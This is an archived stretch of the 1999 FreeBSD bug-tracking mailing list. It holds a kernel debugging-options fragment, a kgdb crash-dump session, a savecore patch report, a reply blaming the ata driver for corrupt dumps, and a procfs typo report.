"Human Interface Devices" #device ukbd0 # Keyboard #device ulpt0 # Printer #controller umass0 # Disks/Mass storage - Requires scbus and da0 #device ums0 # Mouse ##################################################################### # DEBUGGING OPTIONS # # Enable the kernel debugger. # options DDB # # Don't drop into DDB for a panic. Intended for unattended operation # where you may want to drop to DDB from the console, but still want # the machine to recover from a panic # options DDB_UNATTENDED # # If using GDB remote mode to debug the kernel, there's a non-standard # extension to the remote protocol that can be used to use the serial # port as both the debugging port and the system console. It's non- # standard and you're on your own if you enable it. See also the # "remotechat" variables in the FreeBSD specific version of gdb. # options GDB_REMOTE_CHAT # # KTRACE enables the system-call tracing facility ktrace(2). # options KTRACE #kernel tracing # # The INVARIANTS option is used in a number of source files to enable # extra sanity checking of internal structures. This support is not # enabled by default because of the extra time it would take to check # for these conditions, which can only occur as a result of # programming errors. # options INVARIANTS # # The INVARIANT_SUPPORT option makes us compile in support for # verifying some of the internal structures. It is a prerequisite for # 'INVARIANTS', as enabling 'INVARIANTS' will make these functions be # called. The intent is that you can set 'INVARIANTS' for single # source files (by changing the source file or specifying it on the # command line) if you have 'INVARIANT_SUPPORT' enabled. # options INVARIANT_SUPPORT # # The DIAGNOSTIC option is used to enable extra debugging information # from some parts of the kernel. As this makes everything more noisy, # it is disabled by default. # options DIAGNOSTIC ##################################################################### # DEBUGGING OPTIONS # # Enable the kernel debugger. # options DDB # # Don't drop into DDB for a panic. Intended for unattended operation # where you may want to drop to DDB from the console, but still want # the machine to recover from a panic # options DDB_UNATTENDED # # If using GDB remote mode to debug the kernel, there's a non-standard # extension to the remote protocol that can be used to use the serial # port as both the debugging port and the system console. It's non- # standard and you're on your own if you enable it. See also the # "remotechat" variables in the FreeBSD specific version of gdb. # options GDB_REMOTE_CHAT # # KTRACE enables the system-call tracing facility ktrace(2). # options KTRACE #kernel tracing # # The INVARIANTS option is used in a number of source files to enable # extra sanity checking of internal structures. This support is not # enabled by default because of the extra time it would take to check # for these conditions, which can only occur as a result of # programming errors. # options INVARIANTS # # The INVARIANT_SUPPORT option makes us compile in support for # verifying some of the internal structures. It is a prerequisite for # 'INVARIANTS', as enabling 'INVARIANTS' will make these functions be # called. The intent is that you can set 'INVARIANTS' for single # source files (by changing the source file or specifying it on the # command line) if you have 'INVARIANT_SUPPORT' enabled. # options INVARIANT_SUPPORT # # The DIAGNOSTIC option is used to enable extra debugging information # from some parts of the kernel. As this makes everything more noisy, # it is disabled by default. # options DIAGNOSTIC ---------------------------------------------------------------------- > > >Description: > > > > Running gdb on a crash-dump produces this: > > > > (kgdb) exec-file kernel.6 > > (kgdb) core-file vmcore.6 > > Show us exactly what command you typed. Yes, that's important too. I typed gdb -k kernel.debug and then here's my complete emacs buffer with the GDB session: ---------------------------------------------------------------------- Current directory is /sys/compile/HUNAHPU/ GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-unknown-freebsd"... (kgdb) pwd Working directory /usr/src/sys/compile/HUNAHPU. (kgdb) cd /var/crash Working directory /var/crash (canonically /usr/crash). (kgdb) shell ls bounds kernel.6 minfree vmcore.6 (kgdb) exec-file kernel.6 (kgdb) core-file vmcore.6 SMP -1072279740 cpus IdlePTD 0 initial pcb at 2d3500 panic messages: --- dmesg: kvm_read: invalid address (c02ca214) --- cannot read proc pointer at ff800004 (kgdb) bt #0 0x0 in ?? () (kgdb) ---------------------------------------------------------------------- Do you need more information? If so, tell me what. /assar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 25 11:50:13 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C206D1510D for ; Sat, 25 Dec 1999 11:50:07 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA29725; Sat, 25 Dec 1999 11:50:06 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from hunahpu.sics.se (hunahpu.sics.se [193.10.66.220]) by hub.freebsd.org (Postfix) with ESMTP id C1B6A14EB7 for ; Sat, 25 Dec 1999 11:40:48 -0800 (PST) (envelope-from root@hunahpu.sics.se) Received: (from root@localhost) by hunahpu.sics.se (8.9.3/8.9.3) id UAA00692; Sat, 25 Dec 1999 20:40:48 +0100 (CET) (envelope-from root) Message-Id: <199912251940.UAA00692@hunahpu.sics.se> Date: Sat, 25 Dec 1999 20:40:48 +0100 (CET) From: assar@sics.se To: FreeBSD-gnats-submit@freebsd.org Cc: assar@sics.se X-Send-Pr-Version: 3.2 Subject: kern/15690: savecore fails to work when it doesn't find the block-device Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15690 >Category: kern >Synopsis: savecore fails to work when it doesn't find the block-device >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Dec 25 11:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Assar Westerlund >Release: FreeBSD 4.0-19991225-CURRENT i386 >Organization: none >Environment: -current on i386 >Description: savecore tries to open the raw device with a fallback to the block device but this is done wrong and it ends up closing the block device that's used later. Dec 25 19:59:02 hunahpu savecore: /dev/rrad0s1b: No such file or directory; using block device but since we don't have any block devices anymore we might just remove that fallback. >How-To-Repeat: crash and run savecore >Fix: Index: savecore.c =================================================================== RCS file: /home/ncvs/src/sbin/savecore/savecore.c,v retrieving revision 1.28 diff -u -w -r1.28 savecore.c --- savecore.c 1999/12/21 07:41:07 1.28 +++ savecore.c 1999/12/25 19:36:31 @@ -134,7 +134,6 @@ void Lseek __P((int, off_t, int)); int Open __P((const char *, int rw)); int Read __P((int, void *, int)); -char *rawname __P((char *s)); void save_core __P((void)); void usage __P((void)); void Write __P((int, void *, int)); @@ -340,7 +339,7 @@ { register FILE *fp; register int bounds, ifd, nr, nw, ofd; - char *rawp, path[MAXPATHLEN]; + char path[MAXPATHLEN]; mode_t oumask; /* @@ -379,15 +378,8 @@ ofd = Create(path, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH); (void)umask(oumask); - /* Open the raw device. */ - rawp = rawname(ddname); - if ((ifd = open(rawp, O_RDONLY)) == -1) { - syslog(LOG_WARNING, "%s: %m; using block device", rawp); - ifd = dumpfd; - } - /* Seek to the start of the core. */ - Lseek(ifd, (off_t)dumplo, L_SET); + Lseek(dumpfd, (off_t)dumplo, L_SET); /* Copy the core file. */ syslog(LOG_NOTICE, "writing %score to %s", @@ -395,13 +387,13 @@ for (; dumpsize > 0; dumpsize -= nr) { (void)printf("%6dK\r", dumpsize / 1024); (void)fflush(stdout); - nr = read(ifd, buf, MIN(dumpsize, sizeof(buf))); + nr = read(dumpfd, buf, MIN(dumpsize, sizeof(buf))); if (nr <= 0) { if (nr == 0) syslog(LOG_WARNING, "WARNING: EOF on dump device"); else - syslog(LOG_ERR, "%s: %m", rawp); + syslog(LOG_ERR, "%s: %m", ddname); goto err2; } if (compress) @@ -417,7 +409,6 @@ exit(1); } } - (void)close(ifd); if (compress) (void)fclose(fp); else @@ -497,25 +488,6 @@ closedir(dfd); syslog(LOG_ERR, "can't find device %d/%d", major(dev), minor(dev)); exit(1); -} - -char * -rawname(s) - char *s; -{ - char *sl, name[MAXPATHLEN]; - - if ((sl = rindex(s, '/')) == NULL || sl[1] == '0') { - syslog(LOG_ERR, - "can't make raw dump device name from %s", s); - return (s); - } - snprintf(name, sizeof(name), "%.*s/r%s", (int)(sl - s), s, sl + 1); - if ((sl = strdup(name)) == NULL) { - syslog(LOG_ERR, "%s", strerror(errno)); - exit(1); - } - return (sl); } int and if this isn't the right way we should at least avoid closing the file, with this patch: Index: savecore.c =================================================================== RCS file: /home/ncvs/src/sbin/savecore/savecore.c,v retrieving revision 1.28 diff -u -w -u -w -r1.28 savecore.c --- savecore.c 1999/12/21 07:41:07 1.28 +++ savecore.c 1999/12/25 19:37:04 @@ -383,7 +383,7 @@ rawp = rawname(ddname); if ((ifd = open(rawp, O_RDONLY)) == -1) { syslog(LOG_WARNING, "%s: %m; using block device", rawp); - ifd = dumpfd; + ifd = dup(dumpfd); } /* Seek to the start of the core. */ >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 25 15:46:34 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from skynet.ctr.columbia.edu (skynet.ctr.columbia.edu [128.59.64.70]) by hub.freebsd.org (Postfix) with SMTP id 1D40514C94; Sat, 25 Dec 1999 15:46:29 -0800 (PST) (envelope-from wpaul@skynet.ctr.columbia.edu) Received: (from wpaul@localhost) by skynet.ctr.columbia.edu (8.6.12/8.6.9) id SAA17183; Sat, 25 Dec 1999 18:50:29 -0500 From: Bill Paul Message-Id: <199912252350.SAA17183@skynet.ctr.columbia.edu> Subject: Re: kern/15689: gdb on core-dump does not work on current-19991225 To: assar@sics.se (Assar Westerlund) Date: Sat, 25 Dec 1999 18:50:28 -0500 (EST) Cc: bugs@freebsd.org, sos@freebsd.org In-Reply-To: <5logbe6bz5.fsf@assaris.sics.se> from "Assar Westerlund" at Dec 25, 99 08:45:34 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 1570 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Of all the gin joints in all the towns in all the world, Assar Westerlund had to walk into mine and say: > ata-pci0: at device 7.1 on pci0 > ata-pci0: Busmastering DMA supported > ata0 at 0x01f0 irq 14 on ata-pci0 > ata-isa0: already registered as ata0 > ad0: ATA-3 disk at ata0 as master > ad0: 775MB (1587600 sectors), 1575 cyls, 16 heads, 63 S/T, 512 B/S > ad0: 16 secs/int, 1 depth queue, DMA This is your problem. Crash dumps are broken with the ata driver. Again. No, it's not a gdb problem: gdb -k /kernel /dev/mem still works fine. I just tested it on my Dec. 21st snapshot on my laptop (I'm still trying to track down some bugs in the USB code) and had the same problem. I changed to using a kernel with the wd driver and it worked again. Basically, the crash dump generated by the ata driver is corrupt somehow. Unfortunately, I can't offer a fix: I have no ATA clues. I'm cc'ing this to sos@freebsd.org; hopefully he'll be able to track the problem down. -Bill -- ============================================================================= -Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City ============================================================================= "It is not I who am crazy; it is I who am mad!" - Ren Hoek, "Space Madness" ============================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 25 20:50: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2F9BE150F2 for ; Sat, 25 Dec 1999 20:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA64409; Sat, 25 Dec 1999 20:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 4884614BFE; Sat, 25 Dec 1999 20:43:21 -0800 (PST) Message-Id: <19991226044321.4884614BFE@hub.freebsd.org> Date: Sat, 25 Dec 1999 20:43:21 -0800 (PST) From: taka@cs.pitt.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/15696: A minor bug in procfs code Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15696 >Category: misc >Synopsis: A minor bug in procfs code >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Dec 25 20:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Takashi Okumura >Release: 2.2.8, stable >Organization: University of Pittsburgh >Environment: %uname -a FreeBSD hato.cs.pitt.edu 2.2.8-RELEASE FreeBSD 2.2.8-RELEASE #0: Sat Jul 10 20:01:12 EDT 1999 taka@hato.cs.pitt.edu:/rk98/compile/FreeBSD-2.2.8/new/compile/HATO i386 >Description: In the file, ftp://ftp3.freebsd.org/pub/FreeBSD/FreeBSD-stable/src/sys/miscfs/procfs/procfs_status.c procfs_dostatus(curp, p, pfs, uio) ... pid = p->p_pid; ppid = p->p_pptr ? p_p_pptr->p_pid : 0, pgid = p->p_pgrp->pg_id; I believe the middle line should be: ppid = p->p_pptr ? p->p_pptr->p_pid : 0; it seems like every procfs code has this bug since 1996.... >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message